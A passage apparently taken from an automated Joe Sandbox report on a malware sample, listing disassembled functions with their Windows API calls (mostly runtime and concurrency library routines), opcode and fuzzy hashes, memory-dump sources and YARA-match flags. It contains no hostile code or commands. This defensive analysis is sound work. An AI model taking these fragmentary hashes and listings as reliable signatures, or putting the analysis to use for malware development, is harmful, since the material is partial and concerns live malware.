                                                                                                        • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                        • Instruction ID: f2494f1ef04ef44517cd1171a85dede66e5513e309315ffa42068036143921cc
                                                                                                        • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                        • Instruction Fuzzy Hash: 57410771E00210ABDB257BBADC42AAF7664EF5E374F14127FF41882391D73C590946A9
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                        • Instruction ID: 53289fcec6d5d4a5f18a7d91787272a4dbf4ae14c32582ddbac615e2b7646cb0
                                                                                                        • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                        • Instruction Fuzzy Hash: 9841F9319C0134EFDB246FB88C44AAE3AA6EF07770F1406D5FD3997690DB7645428AA1
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0215046A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 02156B41
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02156BCA
                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02156BDC
                                                                                                        • __freea.LIBCMT ref: 02156BE5
                                                                                                          • Part of subcall function 021538FE: RtlAllocateHeap.NTDLL(00000000,0212DACD,00000000), ref: 02153930
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                        • String ID:
                                                                                                        • API String ID: 2652629310-0
                                                                                                        • Opcode ID: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                                                                        • Instruction ID: 6e4468720773b179c811383e9f29ac1a95e8247f976e10701db05f1e79334cde
                                                                                                        • Opcode Fuzzy Hash: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                                                                        • Instruction Fuzzy Hash: 5131EF72A4066AEFDF258F64CC80DAE7BA9EF00714F4902A9EC24D7190EB35DD54CB90
                                                                                                        APIs
                                                                                                        • SetEvent.KERNEL32(?,00000000), ref: 00423729
                                                                                                        • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423711
                                                                                                          • Part of subcall function 0041B71C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B73D
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0042375A
                                                                                                        • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423783
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                        • String ID:
                                                                                                        • API String ID: 2630251706-0
                                                                                                        • Opcode ID: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                                                                        • Instruction ID: fbbc1a7e5a16338d661a11365c58371bffdd4c48ac4c368ddaba424d9e7313e5
                                                                                                        • Opcode Fuzzy Hash: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                                                                        • Instruction Fuzzy Hash: 5911E9747002146BCF04AF659C85DAEB765EB84761B144067FA059B392CBAC9D41C698
                                                                                                        APIs
                                                                                                        • ShowWindow.USER32(00000005), ref: 00401FA5
                                                                                                        • UpdateWindow.USER32 ref: 00401FAD
                                                                                                        • ShowWindow.USER32(00000000), ref: 00401FC1
                                                                                                        • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 00402024
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Show$MoveUpdate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1339878773-0
                                                                                                        • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                        • Instruction ID: 53ee9dd5e88c5c6849e3e7895ae91ae42f7fd804de43801a61d80981d891571f
                                                                                                        • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                        • Instruction Fuzzy Hash: 90016531E006109BC7258F19ED04A267BA7FFD5712B15803AF40C972B1D7B1AC428B9C
                                                                                                        APIs
                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 004290D3
                                                                                                          • Part of subcall function 00429020: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042904F
                                                                                                          • Part of subcall function 00429020: ___AdjustPointer.LIBCMT ref: 0042906A
                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 004290E8
                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 004290F9
                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00429121
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                        • String ID:
                                                                                                        • API String ID: 737400349-0
                                                                                                        • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                        • Instruction ID: 9a28eba3c49a40873050ba514f30250a61a7a586528b59ff06f814ea835fedb3
                                                                                                        • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                        • Instruction Fuzzy Hash: 55014032200159BBDF116E96EC41EEB7F7AEF48758F444009FE4896121C73AEC61DBA8
                                                                                                        APIs
                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0214933A
                                                                                                          • Part of subcall function 02149287: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 021492B6
                                                                                                          • Part of subcall function 02149287: ___AdjustPointer.LIBCMT ref: 021492D1
                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 0214934F
                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02149360
                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 02149388
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                        • String ID:
                                                                                                        • API String ID: 737400349-0
                                                                                                        • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                        • Instruction ID: dc77b57167689ca8191b42602ef4da3f0e69a55721603f7876e792e2d45ee94d
                                                                                                        • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                        • Instruction Fuzzy Hash: A901D772140149BFDF12AEA5CC44EEB7B6AEF99758F054114FE0C66120DB36E8619BA0
                                                                                                        APIs
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue), ref: 00434F51
                                                                                                        • GetLastError.KERNEL32(?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431F9C), ref: 00434F5D
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F6B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 3177248105-0
                                                                                                        • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                        • Instruction ID: 0dde809cff85efe1a06f082dffa05588a2f4c4b6f5b2494ffdd5bda6add1d188
                                                                                                        • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                        • Instruction Fuzzy Hash: 3401FC36615322AFC7214F69AC449A77B98AF89FA1F241531F905D7240D724E90186E8
                                                                                                        APIs
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0215512D,00000000,00000000,00000000,00000000,?,021553E5,00000006,0044A378), ref: 021551B8
                                                                                                        • GetLastError.KERNEL32(?,0215512D,00000000,00000000,00000000,00000000,?,021553E5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,02152203), ref: 021551C4
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0215512D,00000000,00000000,00000000,00000000,?,021553E5,00000006,0044A378,0044A370,0044A378,00000000), ref: 021551D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 3177248105-0
                                                                                                        • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                        • Instruction ID: 4b69bfada66bfa3678d181a90146f3abbe048fb16df3cb9e88dadd007a7fd3a0
                                                                                                        • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                        • Instruction Fuzzy Hash: B001F736691232FBC7214F699C84A567F9AAF06FA27610670FD26D7140C720D901CAE8
                                                                                                        APIs
                                                                                                        • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426138
                                                                                                        • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042614C
                                                                                                        • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426164
                                                                                                        • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042617C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                        • String ID:
                                                                                                        • API String ID: 78362717-0
                                                                                                        • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                        • Instruction ID: ba6f451568feed0ad97d4c35bc03da7052fef1102373e57c37541bd94dea7e10
                                                                                                        • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                        • Instruction Fuzzy Hash: DD01F236700224A7CF16AE5AA811AFFB7A99F80354F41005BFC11A7282DE24FD2192A8
                                                                                                        APIs
                                                                                                        • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 0214639F
                                                                                                        • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 021463B3
                                                                                                        • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 021463CB
                                                                                                        • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021463E3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                        • String ID:
                                                                                                        • API String ID: 78362717-0
                                                                                                        • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                        • Instruction ID: 92bcc48f71d827993f473e6d407bcf7df8b45c5036a5c736c96d27938ccd1e06
                                                                                                        • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                        • Instruction Fuzzy Hash: D201F2326401A4ABDF16AE599840EAF779E9B96358F000015FC2DA7281DF70ED018AA0
                                                                                                        APIs
                                                                                                        • Concurrency::location::_Assign.LIBCMT ref: 02142BA1
                                                                                                        • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02142BBF
                                                                                                          • Part of subcall function 02138677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 02138698
                                                                                                          • Part of subcall function 02138677: Hash.LIBCMT ref: 021386D8
                                                                                                        • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02142BC8
                                                                                                        • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02142BE8
                                                                                                          • Part of subcall function 0213F6CF: Hash.LIBCMT ref: 0213F6E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                        • String ID:
                                                                                                        • API String ID: 2250070497-0
                                                                                                        • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                        • Instruction ID: 2dd2fc7dfd1871132387405eb64127298a5ec9ee2973c3cd3eba0bf26c735b24
                                                                                                        • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                        • Instruction Fuzzy Hash: CC118E76800604AFC715DFA4C880ECAF7BAAF19320F008A1EE95A87591DB70E954CBA0
                                                                                                        APIs
                                                                                                        • Concurrency::location::_Assign.LIBCMT ref: 02142BA1
                                                                                                        • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02142BBF
                                                                                                          • Part of subcall function 02138677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 02138698
                                                                                                          • Part of subcall function 02138677: Hash.LIBCMT ref: 021386D8
                                                                                                        • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02142BC8
                                                                                                        • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02142BE8
                                                                                                          • Part of subcall function 0213F6CF: Hash.LIBCMT ref: 0213F6E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                        • String ID:
                                                                                                        • API String ID: 2250070497-0
                                                                                                        • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                        • Instruction ID: 8b1de421ed42b46fe1fac460c3868a86513d69d33e24ac5828e7b50f735ecf83
                                                                                                        • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                        • Instruction Fuzzy Hash: 92011776400604AFC725EFA5C881EDAF7FAAF58320F008A1EA95A87550DB70F954CBA0
                                                                                                        APIs
                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 0040591C
                                                                                                          • Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44
                                                                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405967
                                                                                                        • __Getcoll.LIBCPMT ref: 00405976
                                                                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405986
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                        • String ID:
                                                                                                        • API String ID: 1836011271-0
                                                                                                        • Opcode ID: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
                                                                                                        • Instruction ID: 7de8e0425e838f52bf763386e227ca4e4c8dd97e461cbe55c35c0d0d082d521b
                                                                                                        • Opcode Fuzzy Hash: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
                                                                                                        • Instruction Fuzzy Hash: 61011771910209DFDB10EFA5C486B9DB7B0EF04329F10843EE459BB681DB789549CF99
                                                                                                        APIs
                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 021250C7
                                                                                                          • Part of subcall function 0212BDA4: __EH_prolog3_GS.LIBCMT ref: 0212BDAB
                                                                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 02125112
                                                                                                        • __Getcoll.LIBCPMT ref: 02125121
                                                                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02125131
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                        • String ID:
                                                                                                        • API String ID: 1836011271-0
                                                                                                        • Opcode ID: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
                                                                                                        • Instruction ID: 2168c2ffdf46ef204956d274b5999c5368e0cff05600ffc67ae50a4a8f60050f
                                                                                                        • Opcode Fuzzy Hash: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
                                                                                                        • Instruction Fuzzy Hash: C6019E31990328EFDB04EFA4D490BDCB7B2FF44310F10812AE049AB281DB759558CF91
                                                                                                        APIs
                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 02125B83
                                                                                                          • Part of subcall function 0212BDA4: __EH_prolog3_GS.LIBCMT ref: 0212BDAB
                                                                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 02125BCE
                                                                                                        • __Getcoll.LIBCPMT ref: 02125BDD
                                                                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02125BED
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                        • String ID:
                                                                                                        • API String ID: 1836011271-0
                                                                                                        • Opcode ID: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
                                                                                                        • Instruction ID: b0991e4a69d73ab769f3353417234bebcb4ad5a7785fd0c3f4d42398a8591205
                                                                                                        • Opcode Fuzzy Hash: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
                                                                                                        • Instruction Fuzzy Hash: 25019E71980329EFDB18EFA4D480BDCB7B2FF04315F10802AE009AB280DBB59558CF90
                                                                                                        APIs
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BEF9
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF2D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Compare_exchange_acquire_4std::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3973403980-0
                                                                                                        • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                        • Instruction ID: 54cf5004022dc03f320fac5c152f4f5b0e5638c7bf5de93af177e0e0418c077f
                                                                                                        • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                        • Instruction Fuzzy Hash: 1901FB3744418DBBDF119E64DD428EE3B66EF08354B148516F918C4235C336CAB2EF89
                                                                                                        APIs
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0213C160
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0213C170
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0213C180
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0213C194
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Compare_exchange_acquire_4std::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3973403980-0
                                                                                                        • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                        • Instruction ID: ea6331ee22eb962fe2a339b183ac29747c171543386fb6992cdedac3bbc2cf2a
                                                                                                        • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                        • Instruction Fuzzy Hash: 2B01A47A584259EBCF239F94DC018AA3B67AB65264F048422F928A8060D733C671AAD1
                                                                                                        APIs
                                                                                                        • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110CB
                                                                                                          • Part of subcall function 0041093D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041095F
                                                                                                          • Part of subcall function 0041093D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410980
                                                                                                        • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110DE
                                                                                                        • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110EA
                                                                                                        • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 004110F3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                        • String ID:
                                                                                                        • API String ID: 4284812201-0
                                                                                                        • Opcode ID: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
                                                                                                        • Instruction ID: f673f10ca75d55ca35707f3ec936348daa0dfd556a05ba3ac72040e7cf752ef9
                                                                                                        • Opcode Fuzzy Hash: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
                                                                                                        • Instruction Fuzzy Hash: 2EF02470A002046BDF347BB648525EE35954F85318F04403FBA12AB7D1DEBC9DC6939D
                                                                                                        APIs
                                                                                                        • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413515
                                                                                                          • Part of subcall function 0041289F: ___crtGetTimeFormatEx.LIBCMT ref: 004128B5
                                                                                                          • Part of subcall function 0041289F: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128D4
                                                                                                        • GetLastError.KERNEL32 ref: 00413531
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413547
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00413555
                                                                                                          • Part of subcall function 00412675: SetThreadPriority.KERNEL32(?,?), ref: 00412681
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                        • String ID:
                                                                                                        • API String ID: 1674182817-0
                                                                                                        • Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                        • Instruction ID: 0599dc728a4d66ec5529e5430020c2b67b59d3184165c4d7970fdf63fa2ec416
                                                                                                        • Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                        • Instruction Fuzzy Hash: 6AF08271A002253AD724BA765D07FFB369C9B01B54F90095BB905E6186F9ECD99042AC
                                                                                                        APIs
                                                                                                        • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0213377C
                                                                                                          • Part of subcall function 02132B06: ___crtGetTimeFormatEx.LIBCMT ref: 02132B1C
                                                                                                          • Part of subcall function 02132B06: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02132B3B
                                                                                                        • GetLastError.KERNEL32 ref: 02133798
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021337AE
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 021337BC
                                                                                                          • Part of subcall function 021328DC: SetThreadPriority.KERNEL32(?,?), ref: 021328E8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
